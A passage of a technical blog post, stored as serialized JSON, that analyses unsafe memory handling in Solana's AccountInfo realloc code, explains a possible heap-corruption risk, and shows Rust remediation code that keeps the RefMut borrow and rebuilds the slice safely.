",{"type":24,"tag":145,"props":24002,"children":24004},{"className":24003},[],[24005],{"type":30,"value":10528},{"type":30,"value":3940},{"type":24,"tag":145,"props":24008,"children":24010},{"className":24009},[],[24011],{"type":30,"value":10528},{"type":30,"value":24013}," is the buffer of a ",{"type":24,"tag":145,"props":24015,"children":24017},{"className":24016},[],[24018],{"type":30,"value":23991},{"type":30,"value":24020},", and so it is the contents of a heap allocation; and, immediately before a heap allocation sits critical metadata. The result? If, for some reason, you construct an ",{"type":24,"tag":145,"props":24022,"children":24024},{"className":24023},[],[24025],{"type":30,"value":21729},{"type":30,"value":24027}," out of an SDK ",{"type":24,"tag":145,"props":24029,"children":24031},{"className":24030},[],[24032],{"type":30,"value":23926},{"type":30,"value":24034}," and then realloc it (which admittedly is quite a stretch), then you get heap corruption - something that's very likely to lead to remote code execution.",{"type":24,"tag":43,"props":24036,"children":24038},{"id":24037},"remediation",[24039],{"type":30,"value":24040},"Remediation",{"type":24,"tag":32,"props":24042,"children":24043},{},[24044],{"type":30,"value":24045},"Obviously the fix for the main issue at hand is to check that the resize operation remains in-bounds. But how do we know how big is too big?",{"type":24,"tag":32,"props":24047,"children":24048},{},[24049,24051,24056,24058,24063,24065,24075,24077,24082,24084,24091],{"type":30,"value":24050},"The sensible thing to do would be to store the initial size in the ",{"type":24,"tag":145,"props":24052,"children":24054},{"className":24053},[],[24055],{"type":30,"value":21729},{"type":30,"value":24057},"... except for the fact that the layout of ",{"type":24,"tag":145,"props":24059,"children":24061},{"className":24060},[],[24062],{"type":30,"value":21729},{"type":30,"value":24064}," is actually part of the ABI between the contract runtime and the loader :face_palm:",{"type":24,"tag":22262,"props":24066,"children":24067},{},[24068],{"type":24,"tag":188,"props":24069,"children":24073},{"href":24070,"ariaDescribedBy":24071,"dataFootnoteRef":7,"id":24072},"#user-content-fn-layout",[22269],"user-content-fnref-layout",[24074],{"type":30,"value":1447},{"type":30,"value":24076}," So, with changing ",{"type":24,"tag":145,"props":24078,"children":24080},{"className":24079},[],[24081],{"type":30,"value":21729},{"type":30,"value":24083}," out of the question, the Solana team came up with a different place to stash the information: inside a section of padding in the serialized buffer passed from the runtime. This happened to be next to where the pubkey was stored, which resulted in the creation of ",{"type":24,"tag":188,"props":24085,"children":24088},{"href":24086,"rel":24087},"https://docs.rs/solana-program/1.10.30/src/solana_program/account_info.rs.html#74-85",[192],[24089],{"type":30,"value":24090},"this function",{"type":30,"value":1679},{"type":24,"tag":291,"props":24093,"children":24095},{"className":9818,"code":24094,"language":9817,"meta":7,"style":7},"/// Return the account's original data length when it was serialized for the\n/// current program invocation.\n///\n/// # Safety\n///\n/// This method assumes that the original data length was serialized as a u32\n/// integer in the 4 bytes immediately preceding the serialized account key.\npub unsafe fn original_data_len(&self) -> usize {\n let key_ptr = self.key as *const _ as *const u8;\n let original_data_len_ptr = key_ptr.offset(-4) as *const u32;\n *original_data_len_ptr as usize\n}\n",[24096],{"type":24,"tag":145,"props":24097,"children":24098},{"__ignoreMap":7},[24099,24107,24115,24123,24131,24138,24146,24154,24202,24267,24332,24353],{"type":24,"tag":301,"props":24100,"children":24101},{"class":303,"line":304},[24102],{"type":24,"tag":301,"props":24103,"children":24104},{"style":1062},[24105],{"type":30,"value":24106},"/// Return the account's original data length when it was serialized for the\n",{"type":24,"tag":301,"props":24108,"children":24109},{"class":303,"line":320},[24110],{"type":24,"tag":301,"props":24111,"children":24112},{"style":1062},[24113],{"type":30,"value":24114},"/// current program invocation.\n",{"type":24,"tag":301,"props":24116,"children":24117},{"class":303,"line":335},[24118],{"type":24,"tag":301,"props":24119,"children":24120},{"style":1062},[24121],{"type":30,"value":24122},"///\n",{"type":24,"tag":301,"props":24124,"children":24125},{"class":303,"line":344},[24126],{"type":24,"tag":301,"props":24127,"children":24128},{"style":1062},[24129],{"type":30,"value":24130},"/// # Safety\n",{"type":24,"tag":301,"props":24132,"children":24133},{"class":303,"line":401},[24134],{"type":24,"tag":301,"props":24135,"children":24136},{"style":1062},[24137],{"type":30,"value":24122},{"type":24,"tag":301,"props":24139,"children":24140},{"class":303,"line":415},[24141],{"type":24,"tag":301,"props":24142,"children":24143},{"style":1062},[24144],{"type":30,"value":24145},"/// This method assumes that the original data length was serialized as a u32\n",{"type":24,"tag":301,"props":24147,"children":24148},{"class":303,"line":439},[24149],{"type":24,"tag":301,"props":24150,"children":24151},{"style":1062},[24152],{"type":30,"value":24153},"/// integer in the 4 bytes immediately preceding the serialized account key.\n",{"type":24,"tag":301,"props":24155,"children":24156},{"class":303,"line":447},[24157,24161,24165,24169,24174,24178,24182,24186,24190,24194,24198],{"type":24,"tag":301,"props":24158,"children":24159},{"style":348},[24160],{"type":30,"value":20484},{"type":24,"tag":301,"props":24162,"children":24163},{"style":348},[24164],{"type":30,"value":21382},{"type":24,"tag":301,"props":24166,"children":24167},{"style":348},[24168],{"type":30,"value":20489},{"type":24,"tag":301,"props":24170,"children":24171},{"style":314},[24172],{"type":30,"value":24173}," original_data_len",{"type":24,"tag":301,"props":24175,"children":24176},{"style":359},[24177],{"type":30,"value":362},{"type":24,"tag":301,"props":24179,"children":24180},{"style":385},[24181],{"type":30,"value":556},{"type":24,"tag":301,"props":24183,"children":24184},{"style":348},[24185],{"type":30,"value":20507},{"type":24,"tag":301,"props":24187,"children":24188},{"style":359},[24189],{"type":30,"value":911},{"type":24,"tag":301,"props":24191,"children":24192},{"style":385},[24193],{"type":30,"value":882},{"type":24,"tag":301,"props":24195,"children":24196},{"style":10246},[24197],{"type":30,"value":20525},{"type":24,"tag":301,"props":24199,"children":24200},{"style":359},[24201],{"type":30,"value":3035},{"type":24,"tag":301,"props":24203,"children":24204},{"class":303,"line":476},[24205,24209,24214,24218,24222,24226,24231,24235,24239,24243,24247,24251,24255,24259,24263],{"type":24,"tag":301,"props":24206,"children":24207},{"style":348},[24208],{"type":30,"value":9838},{"type":24,"tag":301,"props":24210,"children":24211},{"style":369},[24212],{"type":30,"value":24213}," key_ptr",{"type":24,"tag":301,"props":24215,"children":24216},{"style":385},[24217],{"type":30,"value":2537},{"type":24,"tag":301,"props":24219,"children":24220},{"style":348},[24221],{"type":30,"value":20590},{"type":24,"tag":301,"props":24223,"children":24224},{"style":385},[24225],{"type":30,"value":206},{"type":24,"tag":301,"props":24227,"children":24228},{"style":359},[24229],{"type":30,"value":24230},"key ",{"type":24,"tag":301,"props":24232,"children":24233},{"style":348},[24234],{"type":30,"value":15654},{"type":24,"tag":301,"props":24236,"children":24237},{"style":385},[24238],{"type":30,"value":431},{"type":24,"tag":301,"props":24240,"children":24241},{"style":348},[24242],{"type":30,"value":16460},{"type":24,"tag":301,"props":24244,"children":24245},{"style":369},[24246],{"type":30,"value":9873},{"type":24,"tag":301,"props":24248,"children":24249},{"style":348},[24250],{"type":30,"value":15640},{"type":24,"tag":301,"props":24252,"children":24253},{"style":385},[24254],{"type":30,"value":431},{"type":24,"tag":301,"props":24256,"children":24257},{"style":348},[24258],{"type":30,"value":16460},{"type":24,"tag":301,"props":24260,"children":24261},{"style":10246},[24262],{"type":30,"value":21426},{"type":24,"tag":301,"props":24264,"children":24265},{"style":359},[24266],{"type":30,"value":492},{"type":24,"tag":301,"props":24268,"children":24269},{"class":303,"line":495},[24270,24274,24279,24283,24287,24291,24295,24299,24303,24307,24311,24315,24319,24323,24328],{"type":24,"tag":301,"props":24271,"children":24272},{"style":348},[24273],{"type":30,"value":9838},{"type":24,"tag":301,"props":24275,"children":24276},{"style":369},[24277],{"type":30,"value":24278}," original_data_len_ptr",{"type":24,"tag":301,"props":24280,"children":24281},{"style":385},[24282],{"type":30,"value":2537},{"type":24,"tag":301,"props":24284,"children":24285},{"style":369},[24286],{"type":30,"value":24213},{"type":24,"tag":301,"props":24288,"children":24289},{"style":385},[24290],{"type":30,"value":206},{"type":24,"tag":301,"props":24292,"children":24293},{"style":314},[24294],{"type":30,"value":20694},{"type":24,"tag":301,"props":24296,"children":24297},{"style":359},[24298],{"type":30,"value":362},{"type":24,"tag":301,"props":24300,"children":24301},{"style":385},[24302],{"type":30,"value":9253},{"type":24,"tag":301,"props":24304,"children":24305},{"style":466},[24306],{"type":30,"value":1761},{"type":24,"tag":301,"props":24308,"children":24309},{"style":359},[24310],{"type":30,"value":911},{"type":24,"tag":301,"props":24312,"children":24313},{"style":348},[24314],{"type":30,"value":15654},{"type":24,"tag":301,"props":24316,"children":24317},{"style":385},[24318],{"type":30,"value":431},{"type":24,"tag":301,"props":24320,"children":24321},{"style":348},[24322],{"type":30,"value":16460},{"type":24,"tag":301,"props":24324,"children":24325},{"style":10246},[24326],{"type":30,"value":24327}," u32",{"type":24,"tag":301,"props":24329,"children":24330},{"style":359},[24331],{"type":30,"value":492},{"type":24,"tag":301,"props":24333,"children":24334},{"class":303,"line":504},[24335,24340,24345,24349],{"type":24,"tag":301,"props":24336,"children":24337},{"style":385},[24338],{"type":30,"value":24339}," *",{"type":24,"tag":301,"props":24341,"children":24342},{"style":369},[24343],{"type":30,"value":24344},"original_data_len_ptr",{"type":24,"tag":301,"props":24346,"children":24347},{"style":348},[24348],{"type":30,"value":15640},{"type":24,"tag":301,"props":24350,"children":24351},{"style":10246},[24352],{"type":30,"value":23755},{"type":24,"tag":301,"props":24354,"children":24355},{"class":303,"line":512},[24356],{"type":24,"tag":301,"props":24357,"children":24358},{"style":359},[24359],{"type":30,"value":698},{"type":24,"tag":32,"props":24361,"children":24362},{},[24363,24365,24370,24372,24377,24379,24384,24386,24391,24393,24400,24402,24409,24410,24417,24418,24425,24426,24433],{"type":30,"value":24364},"It's marked ",{"type":24,"tag":145,"props":24366,"children":24368},{"className":24367},[],[24369],{"type":30,"value":21148},{"type":30,"value":24371},", properly documented, but there's just one problem: we need this for ",{"type":24,"tag":145,"props":24373,"children":24375},{"className":24374},[],[24376],{"type":30,"value":20432},{"type":30,"value":24378},", which originally was not ",{"type":24,"tag":145,"props":24380,"children":24382},{"className":24381},[],[24383],{"type":30,"value":21148},{"type":30,"value":24385},". So, in the name of not breaking API compatibility, the Solana team just threw the call in an ",{"type":24,"tag":145,"props":24387,"children":24389},{"className":24388},[],[24390],{"type":30,"value":21148},{"type":30,"value":24392}," block and added ",{"type":24,"tag":188,"props":24394,"children":24397},{"href":24395,"rel":24396},"https://docs.rs/solana-program/1.10.30/solana_program/account_info/struct.AccountInfo.html#safety-1",[192],[24398],{"type":30,"value":24399},"a doc comment",{"type":30,"value":24401}," - adding to the ",{"type":24,"tag":188,"props":24403,"children":24406},{"href":24404,"rel":24405},"https://docs.rs/solana-program/1.10.30/solana_program/program/fn.invoke_signed_unchecked.html#safety",[192],[24407],{"type":30,"value":24408},"small",{"type":30,"value":13277},{"type":24,"tag":188,"props":24411,"children":24414},{"href":24412,"rel":24413},"https://docs.rs/solana-program/1.11.2/solana_program/program_memory/fn.sol_memcpy.html#safety",[192],[24415],{"type":30,"value":24416},"pile",{"type":30,"value":13277},{"type":24,"tag":188,"props":24419,"children":24422},{"href":24420,"rel":24421},"https://docs.rs/solana-program/1.11.2/solana_program/program_memory/fn.sol_memset.html#safety",[192],[24423],{"type":30,"value":24424},"of",{"type":30,"value":13277},{"type":24,"tag":188,"props":24427,"children":24430},{"href":24428,"rel":24429},"https://docs.rs/solana-program/1.11.2/solana_program/program_memory/fn.sol_memcmp.html#safety",[192],[24431],{"type":30,"value":24432},"functions",{"type":30,"value":24434}," that are actually unsafe but aren't marked as such for API compatibility reasons (and the last three - all related to each other - don't even have the comment until version 1.11, which isn't even on mainnet as of the time of writing).",{"type":24,"tag":43,"props":24436,"children":24438},{"id":24437},"towards-safer-unsafe",[24439,24441],{"type":30,"value":24440},"Towards safer ",{"type":24,"tag":145,"props":24442,"children":24444},{"className":24443},[],[24445],{"type":30,"value":21148},{"type":24,"tag":32,"props":24447,"children":24448},{},[24449,24451,24456,24458,24463,24465,24471],{"type":30,"value":24450},"Let's circle back to that main ",{"type":24,"tag":145,"props":24452,"children":24454},{"className":24453},[],[24455],{"type":30,"value":21148},{"type":30,"value":24457}," block inside ",{"type":24,"tag":145,"props":24459,"children":24461},{"className":24460},[],[24462],{"type":30,"value":20432},{"type":30,"value":24464}," for a bit, shall we? As a reminder, it looks like ",{"type":24,"tag":188,"props":24466,"children":24469},{"href":24467,"rel":24468},"https://docs.rs/solana-program/1.10.28/src/solana_program/account_info.rs.html#127-136",[192],[24470],{"type":30,"value":8801},{"type":30,"value":1679},{"type":24,"tag":291,"props":24473,"children":24475},{"className":9818,"code":24474,"language":9817,"meta":7,"style":7},"// realloc\nunsafe {\n // First set new length in the serialized data\n let ptr = self.try_borrow_mut_data()?.as_mut_ptr().offset(-8) as *mut u64;\n *ptr = new_len as u64;\n\n // Then set the new length in the local slice\n let ptr = &mut *(((self.data.as_ptr() as *const u64).offset(1) as u64) as *mut u64);\n *ptr = new_len as u64;\n}\n",[24476],{"type":24,"tag":145,"props":24477,"children":24478},{"__ignoreMap":7},[24479,24487,24498,24506,24593,24624,24631,24639,24766,24797],{"type":24,"tag":301,"props":24480,"children":24481},{"class":303,"line":304},[24482],{"type":24,"tag":301,"props":24483,"children":24484},{"style":1062},[24485],{"type":30,"value":24486},"// realloc\n",{"type":24,"tag":301,"props":24488,"children":24489},{"class":303,"line":320},[24490,24494],{"type":24,"tag":301,"props":24491,"children":24492},{"style":348},[24493],{"type":30,"value":21148},{"type":24,"tag":301,"props":24495,"children":24496},{"style":359},[24497],{"type":30,"value":3035},{"type":24,"tag":301,"props":24499,"children":24500},{"class":303,"line":335},[24501],{"type":24,"tag":301,"props":24502,"children":24503},{"style":1062},[24504],{"type":30,"value":24505}," // First set new length in the serialized data\n",{"type":24,"tag":301,"props":24507,"children":24508},{"class":303,"line":344},[24509,24513,24517,24521,24525,24529,24533,24537,24541,24545,24549,24553,24557,24561,24565,24569,24573,24577,24581,24585,24589],{"type":24,"tag":301,"props":24510,"children":24511},{"style":348},[24512],{"type":30,"value":9838},{"type":24,"tag":301,"props":24514,"children":24515},{"style":369},[24516],{"type":30,"value":20650},{"type":24,"tag":301,"props":24518,"children":24519},{"style":385},[24520],{"type":30,"value":2537},{"type":24,"tag":301,"props":24522,"children":24523},{"style":348},[24524],{"type":30,"value":20590},{"type":24,"tag":301,"props":24526,"children":24527},{"style":385},[24528],{"type":30,"value":206},{"type":24,"tag":301,"props":24530,"children":24531},{"style":314},[24532],{"type":30,"value":20667},{"type":24,"tag":301,"props":24534,"children":24535},{"style":359},[24536],{"type":30,"value":20672},{"type":24,"tag":301,"props":24538,"children":24539},{"style":385},[24540],{"type":30,"value":9966},{"type":24,"tag":301,"props":24542,"children":24543},{"style":314},[24544],{"type":30,"value":20681},{"type":24,"tag":301,"props":24546,"children":24547},{"style":359},[24548],{"type":30,"value":20672},{"type":24,"tag":301,"props":24550,"children":24551},{"style":385},[24552],{"type":30,"value":206},{"type":24,"tag":301,"props":24554,"children":24555},{"style":314},[24556],{"type":30,"value":20694},{"type":24,"tag":301,"props":24558,"children":24559},{"style":359},[24560],{"type":30,"value":362},{"type":24,"tag":301,"props":24562,"children":24563},{"style":385},[24564],{"type":30,"value":9253},{"type":24,"tag":301,"props":24566,"children":24567},{"style":466},[24568],{"type":30,"value":10900},{"type":24,"tag":301,"props":24570,"children":24571},{"style":359},[24572],{"type":30,"value":911},{"type":24,"tag":301,"props":24574,"children":24575},{"style":348},[24576],{"type":30,"value":15654},{"type":24,"tag":301,"props":24578,"children":24579},{"style":385},[24580],{"type":30,"value":431},{"type":24,"tag":301,"props":24582,"children":24583},{"style":348},[24584],{"type":30,"value":10550},{"type":24,"tag":301,"props":24586,"children":24587},{"style":10246},[24588],{"type":30,"value":12680},{"type":24,"tag":301,"props":24590,"children":24591},{"style":359},[24592],{"type":30,"value":492},{"type":24,"tag":301,"props":24594,"children":24595},{"class":303,"line":401},[24596,24600,24604,24608,24612,24616,24620],{"type":24,"tag":301,"props":24597,"children":24598},{"style":385},[24599],{"type":30,"value":24339},{"type":24,"tag":301,"props":24601,"children":24602},{"style":369},[24603],{"type":30,"value":3137},{"type":24,"tag":301,"props":24605,"children":24606},{"style":385},[24607],{"type":30,"value":2537},{"type":24,"tag":301,"props":24609,"children":24610},{"style":369},[24611],{"type":30,"value":20750},{"type":24,"tag":301,"props":24613,"children":24614},{"style":348},[24615],{"type":30,"value":15640},{"type":24,"tag":301,"props":24617,"children":24618},{"style":10246},[24619],{"type":30,"value":12680},{"type":24,"tag":301,"props":24621,"children":24622},{"style":359},[24623],{"type":30,"value":492},{"type":24,"tag":301,"props":24625,"children":24626},{"class":303,"line":415},[24627],{"type":24,"tag":301,"props":24628,"children":24629},{"emptyLinePlaceholder":16},[24630],{"type":30,"value":341},{"type":24,"tag":301,"props":24632,"children":24633},{"class":303,"line":439},[24634],{"type":24,"tag":301,"props":24635,"children":24636},{"style":1062},[24637],{"type":30,"value":24638}," // Then set the new length in the local slice\n",{"type":24,"tag":301,"props":24640,"children":24641},{"class":303,"line":447},[24642,24646,24650,24654,24658,24662,24666,24670,24674,24678,24682,24686,24690,24694,24698,24702,24706,24710,24714,24718,24722,24726,24730,24734,24738,24742,24746,24750,24754,24758,24762],{"type":24,"tag":301,"props":24643,"children":24644},{"style":348},[24645],{"type":30,"value":9838},{"type":24,"tag":301,"props":24647,"children":24648},{"style":369},[24649],{"type":30,"value":20650},{"type":24,"tag":301,"props":24651,"children":24652},{"style":385},[24653],{"type":30,"value":2537},{"type":24,"tag":301,"props":24655,"children":24656},{"style":385},[24657],{"type":30,"value":991},{"type":24,"tag":301,"props":24659,"children":24660},{"style":348},[24661],{"type":30,"value":10550},{"type":24,"tag":301,"props":24663,"children":24664},{"style":385},[24665],{"type":30,"value":431},{"type":24,"tag":301,"props":24667,"children":24668},{"style":359},[24669],{"type":30,"value":20809},{"type":24,"tag":301,"props":24671,"children":24672},{"style":348},[24673],{"type":30,"value":20507},{"type":24,"tag":301,"props":24675,"children":24676},{"style":385},[24677],{"type":30,"value":206},{"type":24,"tag":301,"props":24679,"children":24680},{"style":359},[24681],{"type":30,"value":10528},{"type":24,"tag":301,"props":24683,"children":24684},{"style":385},[24685],{"type":30,"value":206},{"type":24,"tag":301,"props":24687,"children":24688},{"style":314},[24689],{"type":30,"value":20830},{"type":24,"tag":301,"props":24691,"children":24692},{"style":359},[24693],{"type":30,"value":20835},{"type":24,"tag":301,"props":24695,"children":24696},{"style":348},[24697],{"type":30,"value":15654},{"type":24,"tag":301,"props":24699,"children":24700},{"style":385},[24701],{"type":30,"value":431},{"type":24,"tag":301,"props":24703,"children":24704},{"style":348},[24705],{"type":30,"value":16460},{"type":24,"tag":301,"props":24707,"children":24708},{"style":10246},[24709],{"type":30,"value":12680},{"type":24,"tag":301,"props":24711,"children":24712},{"style":359},[24713],{"type":30,"value":9961},{"type":24,"tag":301,"props":24715,"children":24716},{"style":385},[24717],{"type":30,"value":206},{"type":24,"tag":301,"props":24719,"children":24720},{"style":314},[24721],{"type":30,"value":20694},{"type":24,"tag":301,"props":24723,"children":24724},{"style":359},[24725],{"type":30,"value":362},{"type":24,"tag":301,"props":24727,"children":24728},{"style":466},[24729],{"type":30,"value":546},{"type":24,"tag":301,"props":24731,"children":24732},{"style":359},[24733],{"type":30,"value":911},{"type":24,"tag":301,"props":24735,"children":24736},{"style":348},[24737],{"type":30,"value":15654},{"type":24,"tag":301,"props":24739,"children":24740},{"style":10246},[24741],{"type":30,"value":12680},{"type":24,"tag":301,"props":24743,"children":24744},{"style":359},[24745],{"type":30,"value":911},{"type":24,"tag":301,"props":24747,"children":24748},{"style":348},[24749],{"type":30,"value":15654},{"type":24,"tag":301,"props":24751,"children":24752},{"style":385},[24753],{"type":30,"value":431},{"type":24,"tag":301,"props":24755,"children":24756},{"style":348},[24757],{"type":30,"value":10550},{"type":24,"tag":301,"props":24759,"children":24760},{"style":10246},[24761],{"type":30,"value":12680},{"type":24,"tag":301,"props":24763,"children":24764},{"style":359},[24765],{"type":30,"value":589},{"type":24,"tag":301,"props":24767,"children":24768},{"class":303,"line":476},[24769,24773,24777,24781,24785,24789,24793],{"type":24,"tag":301,"props":24770,"children":24771},{"style":385},[24772],{"type":30,"value":24339},{"type":24,"tag":301,"props":24774,"children":24775},{"style":369},[24776],{"type":30,"value":3137},{"type":24,"tag":301,"props":24778,"children":24779},{"style":385},[24780],{"type":30,"value":2537},{"type":24,"tag":301,"props":24782,"children":24783},{"style":369},[24784],{"type":30,"value":20750},{"type":24,"tag":301,"props":24786,"children":24787},{"style":348},[24788],{"type":30,"value":15640},{"type":24,"tag":301,"props":24790,"children":24791},{"style":10246},[24792],{"type":30,"value":12680},{"type":24,"tag":301,"props":24794,"children":24795},{"style":359},[24796],{"type":30,"value":492},{"type":24,"tag":301,"props":24798,"children":24799},{"class":303,"line":495},[24800],{"type":24,"tag":301,"props":24801,"children":24802},{"style":359},[24803],{"type":30,"value":698},{"type":24,"tag":32,"props":24805,"children":24806},{},[24807,24809,24814],{"type":30,"value":24808},"We've seen how we could have ran into all sorts of issues here, with the usage of slice layout details, the reborrow creating an unbounded lifetime, and the ",{"type":24,"tag":145,"props":24810,"children":24812},{"className":24811},[],[24813],{"type":30,"value":22292},{"type":30,"value":24815}," borrow not accurately representing the actual usage of its contents. We can do better than this.",{"type":24,"tag":32,"props":24817,"children":24818},{},[24819,24821,24826,24828,24833,24835,24840,24842,24847,24849,24854,24856,24862,24864,24874,24876,24887],{"type":30,"value":24820},"First, let's deal with the ",{"type":24,"tag":145,"props":24822,"children":24824},{"className":24823},[],[24825],{"type":30,"value":22292},{"type":30,"value":24827}," borrowing issue. When we ",{"type":24,"tag":145,"props":24829,"children":24831},{"className":24830},[],[24832],{"type":30,"value":20667},{"type":30,"value":24834},", we get a ",{"type":24,"tag":145,"props":24836,"children":24838},{"className":24837},[],[24839],{"type":30,"value":23522},{"type":30,"value":24841}," back, which represents our borrow of the ",{"type":24,"tag":145,"props":24843,"children":24845},{"className":24844},[],[24846],{"type":30,"value":22292},{"type":30,"value":24848},"'s data. The fix here is simple: keep that ",{"type":24,"tag":145,"props":24850,"children":24852},{"className":24851},[],[24853],{"type":30,"value":23522},{"type":30,"value":24855}," around and use it to access the data, instead of using ",{"type":24,"tag":145,"props":24857,"children":24859},{"className":24858},[],[24860],{"type":30,"value":24861},"RefCell::as_ptr",{"type":30,"value":24863},". Next, the slice; again, the fix is simple. Instead of attempting to modify just the length field, and resorting to using layout information to do so since Rust slices are immutable, we can simply construct a new slice reference and set that. The Rust compiler",{"type":24,"tag":22262,"props":24865,"children":24866},{},[24867],{"type":24,"tag":188,"props":24868,"children":24872},{"href":24869,"ariaDescribedBy":24870,"dataFootnoteRef":7,"id":24871},"#user-content-fn-rustc-llvm",[22269],"user-content-fnref-rustc-llvm",[24873],{"type":30,"value":1761},{"type":30,"value":24875}," is smart enough to realize that the only thing changing is the length field, and so only emits the code to set the length",{"type":24,"tag":22262,"props":24877,"children":24878},{},[24879],{"type":24,"tag":188,"props":24880,"children":24884},{"href":24881,"ariaDescribedBy":24882,"dataFootnoteRef":7,"id":24883},"#user-content-fn-godbolt",[22269],"user-content-fnref-godbolt",[24885],{"type":30,"value":24886},"5",{"type":30,"value":24888},". So then we get:",{"type":24,"tag":291,"props":24890,"children":24892},{"className":9818,"code":24891,"language":9817,"meta":7,"style":7},"let mut slice = self.try_borrow_mut_data()?;\n\n// First set new length in the serialized data\nlet ptr = unsafe { slice.as_mut_ptr().offset(-8) } as *mut u64;\nunsafe { *ptr = new_len as u64 };\n\n// Then set the new length in the local slice\n*slice = unsafe { std::slice::from_raw_parts_mut(slice.as_mut_ptr(), new_len) };\n",[24893],{"type":24,"tag":145,"props":24894,"children":24895},{"__ignoreMap":7},[24896,24940,24947,24954,25038,25078,25085,25092],{"type":24,"tag":301,"props":24897,"children":24898},{"class":303,"line":304},[24899,24903,24907,24912,24916,24920,24924,24928,24932,24936],{"type":24,"tag":301,"props":24900,"children":24901},{"style":348},[24902],{"type":30,"value":3258},{"type":24,"tag":301,"props":24904,"children":24905},{"style":348},[24906],{"type":30,"value":9843},{"type":24,"tag":301,"props":24908,"children":24909},{"style":369},[24910],{"type":30,"value":24911}," slice",{"type":24,"tag":301,"props":24913,"children":24914},{"style":385},[24915],{"type":30,"value":2537},{"type":24,"tag":301,"props":24917,"children":24918},{"style":348},[24919],{"type":30,"value":20590},{"type":24,"tag":301,"props":24921,"children":24922},{"style":385},[24923],{"type":30,"value":206},{"type":24,"tag":301,"props":24925,"children":24926},{"style":314},[24927],{"type":30,"value":20667},{"type":24,"tag":301,"props":24929,"children":24930},{"style":359},[24931],{"type":30,"value":20672},{"type":24,"tag":301,"props":24933,"children":24934},{"style":385},[24935],{"type":30,"value":2003},{"type":24,"tag":301,"props":24937,"children":24938},{"style":359},[24939],{"type":30,"value":492},{"type":24,"tag":301,"props":24941,"children":24942},{"class":303,"line":320},[24943],{"type":24,"tag":301,"props":24944,"children":24945},{"emptyLinePlaceholder":16},[24946],{"type":30,"value":341},{"type":24,"tag":301,"props":24948,"children":24949},{"class":303,"line":335},[24950],{"type":24,"tag":301,"props":24951,"children":24952},{"style":1062},[24953],{"type":30,"value":21195},{"type":24,"tag":301,"props":24955,"children":24956},{"class":303,"line":344},[24957,24961,24965,24969,24973,24977,24981,24985,24989,24993,24997,25001,25005,25009,25013,25018,25022,25026,25030,25034],{"type":24,"tag":301,"props":24958,"children":24959},{"style":348},[24960],{"type":30,"value":3258},{"type":24,"tag":301,"props":24962,"children":24963},{"style":369},[24964],{"type":30,"value":20650},{"type":24,"tag":301,"props":24966,"children":24967},{"style":385},[24968],{"type":30,"value":2537},{"type":24,"tag":301,"props":24970,"children":24971},{"style":348},[24972],{"type":30,"value":21382},{"type":24,"tag":301,"props":24974,"children":24975},{"style":359},[24976],{"type":30,"value":16392},{"type":24,"tag":301,"props":24978,"children":24979},{"style":369},[24980],{"type":30,"value":22103},{"type":24,"tag":301,"props":24982,"children":24983},{"style":385},[24984],{"type":30,"value":206},{"type":24,"tag":301,"props":24986,"children":24987},{"style":314},[24988],{"type":30,"value":20681},{"type":24,"tag":301,"props":24990,"children":24991},{"style":359},[24992],{"type":30,"value":20672},{"type":24,"tag":301,"props":24994,"children":24995},{"style":385},[24996],{"type":30,"value":206},{"type":24,"tag":301,"props":24998,"children":24999},{"style":314},[25000],{"type":30,"value":20694},{"type":24,"tag":301,"props":25002,"children":25003},{"style":359},[25004],{"type":30,"value":362},{"type":24,"tag":301,"props":25006,"children":25007},{"style":385},[25008],{"type":30,"value":9253},{"type":24,"tag":301,"props":25010,"children":25011},{"style":466},[25012],{"type":30,"value":10900},{"type":24,"tag":301,"props":25014,"children":25015},{"style":359},[25016],{"type":30,"value":25017},") } ",{"type":24,"tag":301,"props":25019,"children":25020},{"style":348},[25021],{"type":30,"value":15654},{"type":24,"tag":301,"props":25023,"children":25024},{"style":385},[25025],{"type":30,"value":431},{"type":24,"tag":301,"props":25027,"children":25028},{"style":348},[25029],{"type":30,"value":10550},{"type":24,"tag":301,"props":25031,"children":25032},{"style":10246},[25033],{"type":30,"value":12680},{"type":24,"tag":301,"props":25035,"children":25036},{"style":359},[25037],{"type":30,"value":492},{"type":24,"tag":301,"props":25039,"children":25040},{"class":303,"line":401},[25041,25045,25049,25053,25057,25061,25065,25069,25073],{"type":24,"tag":301,"props":25042,"children":25043},{"style":348},[25044],{"type":30,"value":21148},{"type":24,"tag":301,"props":25046,"children":25047},{"style":359},[25048],{"type":30,"value":16392},{"type":24,"tag":301,"props":25050,"children":25051},{"style":385},[25052],{"type":30,"value":772},{"type":24,"tag":301,"props":25054,"children":25055},{"style":369},[25056],{"type":30,"value":3137},{"type":24,"tag":301,"props":25058,"children":25059},{"style":385},[25060],{"type":30,"value":2537},{"type":24,"tag":301,"props":25062,"children":25063},{"style":369},[25064],{"type":30,"value":20750},{"type":24,"tag":301,"props":25066,"children":25067},{"style":348},[25068],{"type":30,"value":15640},{"type":24,"tag":301,"props":25070,"children":25071},{"style":10246},[25072],{"type":30,"value":12680},{"type":24,"tag":301,"props":25074,"children":25075},{"style":359},[25076],{"type":30,"value":25077}," };\n",{"type":24,"tag":301,"props":25079,"children":25080},{"class":303,"line":415},[25081],{"type":24,"tag":301,"props":25082,"children":25083},{"emptyLinePlaceholder":16},[25084],{"type":30,"value":341},{"type":24,"tag":301,"props":25086,"children":25087},{"class":303,"line":439},[25088],{"type":24,"tag":301,"props":25089,"children":25090},{"style":1062},[25091],{"type":30,"value":22926},{"type":24,"tag":301,"props":25093,"children":25094},{"class":303,"line":447},[25095,25099,25103,25107,25111,25116,25120,25124,25128,25133,25137,25141,25145,25149,25154,25158],{"type":24,"tag":301,"props":25096,"children":25097},{"style":385},[25098],{"type":30,"value":772},{"type":24,"tag":301,"props":25100,"children":25101},{"style":369},[25102],{"type":30,"value":22103},{"type":24,"tag":301,"props":25104,"children":25105},{"style":385},[25106],{"type":30,"value":2537},{"type":24,"tag":301,"props":25108,"children":25109},{"style":348},[25110],{"type":30,"value":21382},{"type":24,"tag":301,"props":25112,"children":25113},{"style":359},[25114],{"type":30,"value":25115}," { 